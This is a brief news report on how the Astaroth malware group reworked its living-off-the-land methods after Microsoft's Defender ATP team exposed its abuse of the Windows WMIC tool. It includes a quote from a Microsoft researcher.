Astaroth, a group that uses legitimate Windows tools to spread malware, has retooled after Microsoft drew attention to its living-off-the-land techniques last July. The group in February stepped up its activity with even stealthier methods.
Last year the Windows Defender ATP team detected a huge spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool, which is built in to Windows.
Microsoft's investigation found a major spam operation spreading email with a link to a website hosting a .LNK shortcut file. If a recipient downloaded and ran the file, it would launch WMIC and several other Windows tools to download and run fileless malware in memory, below the view of traditional antivirus.
"Astaroth now completely avoids the use of WMIC and related techniques to bypass existing detections," Hardik Suri of the Microsoft Defender ATP Research Team said in a new update.